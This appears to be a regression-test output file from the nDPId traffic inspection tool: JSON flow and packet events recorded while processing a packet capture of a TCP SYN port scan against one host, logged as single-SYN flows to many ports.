-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsgdcAACwGmpusEAAIQA2GNIzTDx\/dU4MZAAAAAGACBAAlbQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsLsYAACgG8aysEAAIQA2GNIzTx5\/dU4MZAAAAAGACBABs7AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsiAkAADEGj2msEAAIQA2GNIzTCvndU4MZAAAAAGACCAAlkwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAs8b4AAC8GJ7SsEAAIQA2GNIzTCFfdU4MZAAAAAGACEAAgNQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAs48AAACcGPbKsEAAIQA2GNIzTACXdU4MZAAAAAGACEAAoZwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060661,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_packet_id":1,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060661,"pkt":"ACYLMQczACWzv5HuCABFAAAsBW4AADIGEQWsEAAIQA2GNIzTDQXdU4MZAAAAAGACDAAfhwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060661,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_packet_id":1,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060661,"pkt":"ACYLMQczACWzv5HuCABFAAAsrMwAAC4GbaasEAAIQA2GNIzTB+XdU4MZAAAAAGACDAAkpwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060693,"flow_last_seen":1278275060693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060693,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_packet_id":1,"flow_last_seen":1278275060693,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060693,"pkt":"ACYLMQczACWzv5HuCABFAAAs8uUAACYGL42sEAAIQA2GNIzTBFrdU4MZAAAAAGACDAAoMgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsvn0AAC0GXPWsEAAIQA2GNIzTH0jdU4MZAAAAAGACCAARRAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsiAIAADgGiHCsEAAIQA2GNIzTBR7dU4MZAAAAAGACBAAvbgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsIScAAC0G+kusEAAIQA2GNIzTF3LdU4MZAAAAAGACCAAZGgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsoGcAADIGdgusEAAIQA2GNIzTAlHdU4MZAAAAAGACDAAqOwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAshhwAACcGm1asEAAIQA2GNIzT8czdU4MZAAAAAGACEAA2vwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsU1UAADoGux2sEAAIQA2GNIzTS5bdU4MZAAAAAGACDADg9QAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsEgUAADgG\/m2sEAAIQA2GNIzTHz\/dU4MZAAAAAGACBAAVTQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsBjQAADAGEj+sEAAIQA2GNIzTYODdU4MZAAAAAGACBADTqwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsG38AADYG9vOsEAAIQA2GNIzTDPvdU4MZAAAAAGACDAAfkQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsV1gAACgGyRqsEAAIQA2GNIzTAZfdU4MZAAAAAGACBAAy9QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsso4AADcGXuSsEAAIQA2GNIzTAJLdU4MZAAAAAGACEAAn+gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsJu4AACgG+YSsEAAIQA2GNIzTH1\/dU4MZAAAAAGACBAAVLQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsyyYAADkGREysEAAIQA2GNIzTAtDdU4MZAAAAAGACCAAtvAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAssr4AADYGX7SsEAAIQA2GNIzTF9TdU4MZAAAAAGACDAAUuAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsicIAADMGi7CsEAAIQA2GNIzSFrfdUoMYAAAAAGACEAAR2AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060695,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_packet_id":1,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060695,"pkt":"ACYLMQczACWzv5HuCABFAAAsP70AADsGzbWsEAAIQA2GNIzSITTdUoMYAAAAAGACEAAHWwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060695,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_packet_id":1,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060695,"pkt":"ACYLMQczACWzv5HuCABFAAAsHbsAACcGA7isEAAIQA2GNIzSBALdUoMYAAAAAGACEAAkjQAAAgQFtA=="} 